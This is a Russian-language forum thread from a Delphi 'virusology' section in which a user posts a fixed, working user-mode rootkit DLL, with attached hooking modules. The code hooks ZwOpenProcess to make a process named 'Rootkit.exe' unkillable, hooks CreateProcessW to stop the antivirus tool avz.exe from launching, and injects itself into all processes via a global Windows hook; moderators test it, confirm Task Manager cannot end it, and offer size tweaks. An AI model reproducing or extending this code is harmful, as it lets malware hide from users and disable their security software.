[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]

Страница 1 из 1

Модератор форума: Волк-1024, Anton93, xXxSh@dowxXx

delfcode » Delphi » Вирусология Delphi » перехват api (хук)

перехват api

oke

Дата: Воскресенье, 10.06.2012, 15:51 | Сообщение # 1

Постоянный

Зарегистрирован: 15.01.2012

Группа: Пользователи

Сообщений: 124

Статус: Offline

вот нашел статью на сайте https://delfcode.ru/publ/delphi/delphivir/pishem_prostoj_rootkit_na_delphi_7/1-1-0-126 но там полно ошибок и нехватает модулей
вот решил исправить все ошибки и добавить модули

Code

library HOOK;

uses
    windows,
    SysUtils,advApiHook;

type
   NTStatus = cardinal;
   far_jmp = packed record
   push:byte;
   PProc:pointer;
   ret:byte;
end;

OldCode = packed record
   one:dword;
   two:word;
end;

PUnicodeString = ^TUnicodeString;
   TUnicodeString = packed record
   Length: Word;
   MaximumLength: Word;
   Buffer: PWideChar;
end;

PObjectAttributes = ^TObjectAttributes;
   TObjectAttributes = packed record
   Length: DWORD;
   RootDirectory: THandle;
   ObjectName: PUnicodeString;
   Attributes: DWORD;
   SecurityDescriptor: Pointer;
   SecurityQualityOfService: Pointer;
end;

PClientID = ^TClientID;
TClientID = packed record
   UniqueProcess:cardinal;
   UniqueThread:cardinal;
end;

type
   PStartupInfo = ^TStartupInfo;
   STARTUPINFOW = record
   cb: DWORD;
   lpReserved: Pointer;
   lpDesktop: Pointer;
   lpTitle: Pointer;
   dwX: DWORD;
   dwY: DWORD;
   dwXSize: DWORD;
   dwYSize: DWORD;
   dwXCountChars: DWORD;
   dwYCountChars: DWORD;
   dwFillAttribute: DWORD;
   dwFlags: DWORD;
   wShowWindow: Word;
   cbReserved2: Word;
   lpReserved2: PByte;
   hStdInput: THandle;
   hStdOutput: THandle;
   hStdError: THandle;
   end;
   TStartupInfo = _STARTUPINFOA;
   STARTUPINFO = _STARTUPINFOA;

PProcessInformation = ^TProcessInformation;
_PROCESS_INFORMATION = record
   hProcess: THandle;
   hThread: THandle;
   dwProcessId: DWORD;
   dwThreadId: DWORD;
end;
   TProcessInformation = _PROCESS_INFORMATION;
   PROCESS_INFORMATION = _PROCESS_INFORMATION;

Type
   USHORT = Word;
   PWSTR = {$IFDEF USE_DELPHI_TYPES} Windows.LPWSTR {$ELSE} PWideChar {$ENDIF};
   HANDLE = {$IFDEF USE_DELPHI_TYPES} Windows.THandle {$ELSE} Longword {$ENDIF};
   PHANDLE = {$IFDEF USE_DELPHI_TYPES} Windows.PHandle {$ELSE} ^HANDLE {$ENDIF};
   PVOID = Pointer;
type
   PUNICODE_STRING = ^UNICODE_STRING;
   _UNICODE_STRING = record
   Length: USHORT;
   MaximumLength: USHORT;
   Buffer: PWSTR;
   end;
   UNICODE_STRING = _UNICODE_STRING;
   PCUNICODE_STRING = ^UNICODE_STRING;

const
   STATUS_ACCESS_DENIED = NTStatus($C0000022);
   STATUS_SUCCESS = NTSTATUS($00000000);

Function ZwOpenProcess(phProcess:PDWORD; AccessMask:DWORD; ObjectAttributes:PObjectAttributes;
   ClientID:PClientID): NTStatus; stdcall; external 'ntdll.dll' name 'ZwOpenProcess';

function CreateProcessW(lpApplicationName: PWideChar; lpCommandLine: PWideChar;
   lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
   bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
   lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfo;
   var lpProcessInformation: TProcessInformation): BOOL; stdcall; external 'kernel32.dll' name 'CreateProcessW';

function CreateProcessA(lpApplicationName: PAnsiChar; lpCommandLine: PAnsiChar;
   lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
   bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
   lpCurrentDirectory: PAnsiChar; const lpStartupInfo: TStartupInfo;
   var lpProcessInformation: TProcessInformation): BOOL; stdcall; external 'kernel32.dll' name 'CreateProcessA';

var
   PFunc, CPA, CPW: pointer;
   OldFunc, OldCPA, OldCPW: OldCode;
   NewFunc, JmpCPA, JmpCPW: Far_jmp;
   b, pid: dword;

procedure UnHook;
begin
   WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(Oldcode),b);
   WriteProcessMemory(INVALID_HANDLE_VALUE,CPA,@OldCPA,sizeof(Oldcode),b);
end;

function TrueCreateProcessW(lpApplicationName: PWideChar; lpCommandLine: PWideChar;
   lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
   bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
   lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfo;
   var lpProcessInformation: TProcessInformation): BOOL; stdcall;
begin
   WriteProcessMemory(INVALID_HANDLE_VALUE,CPA,@OldCPA,sizeof(Oldcode),b);
   Result:= CreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes,
   bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
   WriteProcessMemory(INVALID_HANDLE_VALUE,CPA,@JmpCPA,sizeof(far_jmp),b);
end;

function NewCreateProcessW(lpApplicationName: PWideChar; lpCommandLine: PWideChar;
   lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
   bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
   lpCurrentDirectory: PWideChar; const lpStartupInfo: TStartupInfo;
   var lpProcessInformation: TProcessInformation): BOOL; stdcall;
begin
   if (ExtractFileName(lpApplicationName)= 'avz.exe') then Result:= False else
   Result := TrueCreateProcessW(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes,bInheritHandles, dwCreationFlags, lpEnvironment,
   lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
end;

Function TrueZwOpenProcess(phProcess:PDWORD; AccessMask:DWORD;ObjectAttributes:PObjectAttributes;
   ClientID:PClientID):NTStatus;stdcall;
begin
   WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(Oldcode),b);
   Result:= ZwOpenProcess(phProcess,AccessMask,ObjectAttributes,ClientID);
   WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@NewFunc,sizeof(far_jmp),b);
end;

Function NewZwOpenProcess(phProcess:PDWORD;AccessMask:DWORD;ObjectAttributes:PObjectAttributes;
   ClientID:PClientID):NTStatus;stdcall;
begin
   if (ClientID<>nil) and (ClientID.UniqueProcess=pid) then
   begin
   Result:=STATUS_ACCESS_DENIED;
   exit;
   end;
   Result:= TrueZwOpenProcess(phProcess,AccessMask,ObjectAttributes,ClientID);
end;

Function TrueCreateProcessA(lpApplicationName: PAnsiChar; lpCommandLine: PAnsiChar;
   lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
   bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
   lpCurrentDirectory: PAnsiChar; const lpStartupInfo: TStartupInfo;
   var lpProcessInformation: TProcessInformation): BOOL; stdcall;
begin
   WriteProcessMemory(INVALID_HANDLE_VALUE,CPW,@OldCPW,sizeof(Oldcode),b);
   Result:= CreateProcessA(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes,
   bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
   WriteProcessMemory(INVALID_HANDLE_VALUE,CPW,@JmpCPW,sizeof(far_jmp),b);
end;

function NewCreateProcessA(lpApplicationName: PAnsiChar; lpCommandLine: PAnsiChar;
   lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
   bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
   lpCurrentDirectory: PAnsiChar; const lpStartupInfo: TStartupInfo;
   var lpProcessInformation: TProcessInformation): BOOL; stdcall;
begin
   //////
   Result:= TrueCreateProcessA(lpApplicationName, lpCommandLine, lpProcessAttributes, lpThreadAttributes,
   bInheritHandles, dwCreationFlags, lpEnvironment, lpCurrentDirectory, lpStartupInfo, lpProcessInformation);
end;

procedure SetHook;
begin
   PFunc:= GetProcAddress(GetModuleHandle('ntdll.dll'),'ZwOpenProcess');
   CPA:=GetProcAddress(GetModuleHandle('kernel32.dll'),'CreateProcessW');
   ReadProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(oldcode),b);
   ReadProcessMemory(INVALID_HANDLE_VALUE,CPA,@OldCPA,sizeof(oldcode),b);
   NewFunc.push:=$68;
   NewFunc.PProc:=@NewZwOpenProcess;
   NewFunc.ret:=$C3;
   JmpCPA.push:=$68;
   JmpCPA.PProc:=@NewCreateProcessW;
   JmpCPA.ret:=$C3;
   WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@NewFunc,sizeof(far_jmp),b);
   WriteProcessMemory(INVALID_HANDLE_VALUE,CPA,@JmpCPA,sizeof(far_jmp),b);
end;

procedure GetPID;
begin
   pid:= GetProcessID('Rootkit.exe');
end;

function MessageProc(code : integer; wParam : word; lParam : longint) : longint; stdcall;
begin
   CallNextHookEx(0,code,wParam,lParam);
end;

procedure SetGlobalHookProc();
begin
   SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0);
   Sleep(INFINITE)
end;

procedure SetGlobalHook();
var
   hMutex: dword;
   TrId: dword;
begin
   hMutex := CreateMutex(nil, false, '[{ADA5458-6AB8-7C4D-88BA-44A06478C676}]');
   if GetLastError = 0 then
   CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId)
   else
   CloseHandle(hMutex)
end;

procedure DLLEntryPoint(dwReason: DWord);
begin
   case dwReason of
   DLL_PROCESS_ATTACH: begin
   GetPID;
   SetHook;
   SetGlobalHook;
   end;
   DLL_PROCESS_DETACH: begin
   UnHook;
   end;
   end;
end;

begin
   DllProc:= @DLLEntryPoint;
   DLLEntryPoint(DLL_PROCESS_ATTACH);
end.

вот и модули

Прикрепления: advApiHook.pas(53Kb) · NativeAPI.pas(24Kb)

Сообщение отредактировал oke - Воскресенье, 10.06.2012, 18:24

Волк-1024

Дата: Воскресенье, 10.06.2012, 19:05 | Сообщение # 2

Авторитетный

Зарегистрирован: 24.07.2011

Группа: Модераторы

Сообщений: 467

Статус: Offline

Нужно избавиться от модуля SysUtils, тогда рамер dll'ки уменьшится в 2 раза. В коде импортируется одна функа из модуля: ExtractFileName её либо перетащить от туда, либо написать свою.

oke

Дата: Воскресенье, 10.06.2012, 19:18 | Сообщение # 3

Постоянный

Зарегистрирован: 15.01.2012

Группа: Пользователи

Сообщений: 124

Статус: Offline

Волк-1024, я исправлял на скорую руку думал код вообще не рабочий

xXxSh@dowxXx

Дата: Воскресенье, 10.06.2012, 19:47 | Сообщение # 4

Авторитетный

Зарегистрирован: 22.01.2012

Группа: Модераторы

Сообщений: 702

Статус: Offline

прошу прощения, немножко не догнал что делает этот код, после работы вобще голова не работает =(

поясните пожалуйста по подробней...

хук блокирует любые действия с процессом Rootkit.exe или я ошибаюсь?

Сообщение отредактировал xXxSh@dowxXx - Воскресенье, 10.06.2012, 19:48

Волк-1024

Дата: Воскресенье, 10.06.2012, 19:53 | Сообщение # 5

Авторитетный

Зарегистрирован: 24.07.2011

Группа: Модераторы

Сообщений: 467

Статус: Offline

Да. Она делает так, что нельзя завершить процесс. Только что проверил. И вот еще что. Почему-то не отброжается от какого пользователя была запущена прога. Видимо баг, а так ваще хз.

Сообщение отредактировал Волк-1024 - Воскресенье, 10.06.2012, 19:55

xXxSh@dowxXx

Дата: Воскресенье, 10.06.2012, 20:07 | Сообщение # 6

Авторитетный

Зарегистрирован: 22.01.2012

Группа: Модераторы

Сообщений: 702

Статус: Offline

а при чем тут avz.exe ?

или он определенному процессу запрещает вмешиваться в другой процесс, а не всем?

Сообщение отредактировал xXxSh@dowxXx - Воскресенье, 10.06.2012, 20:08

Волк-1024

Дата: Воскресенье, 10.06.2012, 20:19 | Сообщение # 7

Авторитетный

Зарегистрирован: 24.07.2011

Группа: Модераторы

Сообщений: 467

Статус: Offline

Он всем запрещает. Ну во всяком случае диспечер не может завершить его. biggrin

Сообщение отредактировал Волк-1024 - Воскресенье, 10.06.2012, 21:15

Волк-1024

Дата: Воскресенье, 10.06.2012, 21:17 | Сообщение # 8

Авторитетный

Зарегистрирован: 24.07.2011

Группа: Модераторы

Сообщений: 467

Статус: Offline

Вот реализация ExtractFileName. Правда, кривовата, но работает. smile

Сообщение отредактировал Волк-1024 - Воскресенье, 10.06.2012, 21:28

Волк-1024

Дата: Понедельник, 11.06.2012, 00:33 | Сообщение # 9

Авторитетный

Зарегистрирован: 24.07.2011

Группа: Модераторы

Сообщений: 467

Статус: Offline

Вот переработал + еще от нефиг делать накодил:

Code

function GetLastPosDivider(const Str: string): Integer;
var
      StrLen, B, E: Integer;
begin
      Result:=0;
      StrLen:=LStrLen(PChar(Str));
      B:=StrLen;
      for E:=0 to StrLen do
      begin
         if (Str[B]='\') or (Str[B]='/') then
         begin
            Result:=(StrLen-E);
            Exit;
         end;
         Dec(B);
      end;
end;

function GetFirstPosDivider(const Str: string): Integer;
var
      StrLen, B: Integer;
begin
      Result:=0;
      StrLen:=LStrLen(PChar(Str));
      for B:=0 to StrLen do
      begin
         if (Str[B]='\') or (Str[B]='/') then
         begin
            Result:=B;
            Exit;
         end;
      end;
end;

function ExtractDriveName(const Path: string): string;
var
      FirstDivider: Integer;
begin
      FirstDivider:=GetFirstPosDivider(Path);
      if FirstDivider<>0 then
         Result:=Copy(Path, 0, FirstDivider);
end;

function ExtractFilePath(const Path: string): string;
var
      LastDivider: Integer;
begin
      LastDivider:=GetLastPosDivider(Path);
      if LastDivider<>0 then
         Result:=Copy(Path, 1, LastDivider);
end;

function ExtractFileName(const Path: string): string;
var
      LastDivider: Integer;
begin
      LastDivider:=GetLastPosDivider(Path);
      if LastDivider<>0 then
         Result:=Copy(Path, LastDivider+1, MaxInt);
end;

function ExtractFileDir(const Path: string): string;
var
      LastDivider: Integer;
begin
      LastDivider:=GetLastPosDivider(Path);
      if LastDivider<>0 then
         Result:=Copy(Path, 0, LastDivider-1);
end;

Сообщение отредактировал Волк-1024 - Понедельник, 11.06.2012, 00:35

oke

Дата: Вторник, 12.06.2012, 00:51 | Сообщение # 10

Постоянный

Зарегистрирован: 15.01.2012

Группа: Пользователи

Сообщений: 124

Статус: Offline

xXxSh@dowxXx, в данном случае только Rootkit.exe

oke

Дата: Вторник, 12.06.2012, 00:54 | Сообщение # 11

Постоянный

Зарегистрирован: 15.01.2012

Группа: Пользователи

Сообщений: 124

Статус: Offline

Волк-1024, это не баг тут идет перехват ZwOpenProcess

oke

Дата: Вторник, 12.06.2012, 01:02 | Сообщение # 12

Постоянный

Зарегистрирован: 15.01.2012

Группа: Пользователи

Сообщений: 124

Статус: Offline

xXxSh@dowxXx, а avz есть такая антивирусная ультилита так вот dll не дает ей запуститься

xXxSh@dowxXx

Дата: Вторник, 12.06.2012, 01:14 | Сообщение # 13

Авторитетный

Зарегистрирован: 22.01.2012

Группа: Модераторы

Сообщений: 702

Статус: Offline

Quote (oke)

а avz есть такая антивирусная ультилита так вот dll не дает ей запуститься

все, ок, теперь тебя понял, а что разве avz прикроет эту длл?

ах да он же может её выгрузить точно...

Сообщение отредактировал xXxSh@dowxXx - Вторник, 12.06.2012, 01:15

oke

Дата: Вторник, 12.06.2012, 01:29 | Сообщение # 14

Постоянный

Зарегистрирован: 15.01.2012

Группа: Пользователи

Сообщений: 124

Статус: Offline

xXxSh@dowxXx, avz все прикроет это мощная антишпионская система)

delfcode » Delphi » Вирусология Delphi » перехват api (хук)

Страница 1 из 1